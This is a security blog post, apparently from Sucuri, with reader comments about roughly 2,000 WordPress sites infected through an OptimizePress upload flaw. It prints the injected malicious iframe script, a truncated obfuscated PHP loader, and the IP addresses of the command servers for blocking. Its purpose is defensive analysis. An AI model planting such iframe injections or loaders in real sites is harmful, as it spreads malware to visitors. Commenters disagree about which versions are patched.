A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major.
That all changed yesterday when we detected roughly 2,000 websites compromised with iframes that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptmizePress, and they all had the same iFrame injected in them:
<script> if(document.all ){ document.write ("<iframe src=" httx:// gezidotojyk.org/ ohui.cgi?19" width="1" height="1"></iframe>"
We also see that Google has started to blacklist the compromised sites, and just for this one iframe variation from gezidotojyk.org, they blacklisted almost 1,500 sites:
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, gezidotojyk.org appeared to function as an intermediary for the infection of 1442 site(s) including dalluva.com/, criesaude.com/, brownstonefitness.com/.Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1382 domain(s), including dalluva.com/, criesaude.com/, pathtoawesome.com/.
Searching For This iFrame
You shouldn’t even bother searching for this iframe, or the normal “eval” injections you may see. This malware is a lot smarter, hiding itself using multiple encoding variations, and looks similar to this:
$UigPzaGqpe6SKfF= array("5362','5379','5358',&quit;5369');$ NBfWJmicev5SrqsFzzlYzRfOVbwwh2pZtvM2H= array('2596','2611','2598','2594','2613','2598','2592','2599','2614','2607','2596','2613','2602','2608','2607');$jLf0uwhN2GcduBVAgHBD3JvjyPEaIcVDO1u8oBLg7Nksf6S= array('6978','6977','6995','6981','6934','6932','6975','6980','6981','6979','6991','6980','6981');$EEvXCh2Cm5rvV..
When decoded, this array contacts the malware “mothership” on one of these IP’s to get the updated injection. If you have been hit, take a look at your theme and plugin files, you will likely find all of them injected with a similar payload. For ISP’s, here are the mothership IP addresses that can be blocked:
$know[] = "151.236.14.86"; $know[] = "149.154.157.133"; $know[] = "37.235.54.48"; $know[] = "31.215.205.196";
Protection and Recovery
You need to update OptmizePress installations ASAP to prevent the reinfections.
Clients using our website firewall are already protected.
The Sucuri Research Team is also analyzing the injections and we will post more details when we learn them.
20 comments
Could you be so kind and state that the vulnerability was present in OptimizePress version 1 and was fixed in version 1.62 in April, 2013. OptimizePress 2 is based on an entirely new secure code base.
I concur! This post will cause a lot of confusion for folks who have already updated to OP 1.62
What version of optimizepress is the ‘safe’ one? 1.61 or 1.62 . I’m indeed confused.
You know, I’m not exactly sure. I just updated to 1.62. Contact OptimizePress and find out
1.62 is secure
hello conforest, the current version on the download page of OptimizePress is 1.64 as of april 03, 2014. so this follows its already fixed? pls confirm, thanks!
Yes, all version after 1.61 are secure
thanks! back to work and cleaning the entire host now đ
Yes it’s happened overnight to one of our sites. As per Codeforest will upgrading OptimizePress version 1 work or does int need to be V2?
Fixed version is OptimizePress 1.61 (released in april,2013), current version of OptimizePress 1 is 1.62.
OptimizePress 2 was never affected with this vulnerability.
Nice Discovery, Impressive
I was provided the suspicious snippet in the Google Webmaster tools, and found your write up on the issue, but to my surprise I don’t have OptimizePress in my list of plugins in wordpress. Am I missing something?
Note that the IP list as mentioned on this page is only valid for the initial connection attempt. Once an infected server has connected to a ‘mothership’ it will also retrieve a list of new IP addresses and will use those as the new mothership addresses.
At the moment those addresses are (freshly retrieved from a ‘mothership’ just minutes ago):
5.149.250.150
31.215.205.196
37.235.48.74
37.235.54.48
46.21.146.152
85.159.237.231
91.200.14.122
94.76.220.90
95.85.39.230
109.206.165.95
144.76.232.49
146.0.79.182
149.154.152.129
149.154.157.133
151.236.14.86
158.255.215.135
178.21.23.230
188.66.5.127
192.243.126.38
Fixed version is OptimizePress 1.61 (released in april,2013), current version of OptimizePress 1 is 1.62.
OptimizePress 2 was never affected with this vulnerability.
Well it looks as if OP 2.0 is now infected too. My site worked fine earlier this evening and now all I see is the word “array.” Any ideas how I can clean the site from this malware?
Nice ideas.
My Optimize Press site is infected (whenever I load the site for the first time, there’s a legend about displaying cookies, whatever you click -accept or decline- then a link appears) and I always update as soon as there’s a new release.
Problem is, MediaTemple were “kind enough” to let me know they can’t do anything about it or charge me with $175 to have it fixed.
Needless to say, I moved from Hostgator to get superior support and a friend of mine who is hosted with HG and was having the same exact problem, got it fixed for FREE by the HG guys.
The irony on this one is KILLING ME.
We’ve been seeing this with a customer using OptimizePress. A major issue is that they use add-on domains in cPanel under a single cPanel account (despite having their own dedicated server). As a result, every add-on domain in the account was hit.
Another thing we found is hackers uploading PHP shell backdoors. These files can be spotted by having PHP files in various upload/cache directories.
We have some initial evidence that attackers are uploading these backdoors and then using them later to re-exploit the server — even after you’ve patched things up.
Unfortunately, remote scanning does not detect these files. We’ve had to use various on-server scanning tools as well as manually searching for certain string patters in the code injections.
Thanks for posting this. I’ve been fighting this for a while. I have 1 site on a windows server that used the pre patched version of OptimizePress. The infection spread to other wordpress sites not using optimizepress that are on the same server.
I found the infection by searching for this string: =’);?> i It’s at the end of the encrypted php that gets put in files such as index.php, wp-config.php, etc. If you do a text search on *.php files looking for that string you will find the infected sites.
I cleaned all this up several weeks ago, only to find that the site with OptimizePress had become infected again. It had not infected other sites yet. It left a php file in the root of the site with a name I didn’t recognize and that’s where I found the ip addresses that when searched on led me to this blog post. After reading this post, I updated OptimizePress.
What else does this infection put on the server? My server stops responding several times a day for about 2 minutes and then is fine until the next hang up. What else can I use to find code this exploit uses?
Just got this message when deleting a hacked site with OptimizePress:
Removing User & Group…….Success…Done
rm: cannot remove `/public_html/wp-content/plugins/optimizePressPlugin/lib/assets/tpls/feature_box_creator/searchinfo.php’: Operation not permitted
rm: cannot remove `public_html/wp-content/plugins/optimizePressPlugin/lib/assets/tpls/feature_box_creator/.frsdfg’: Operation not permitted
Is this proof that hacked got in from OptimizePress plugin??
Comments are closed.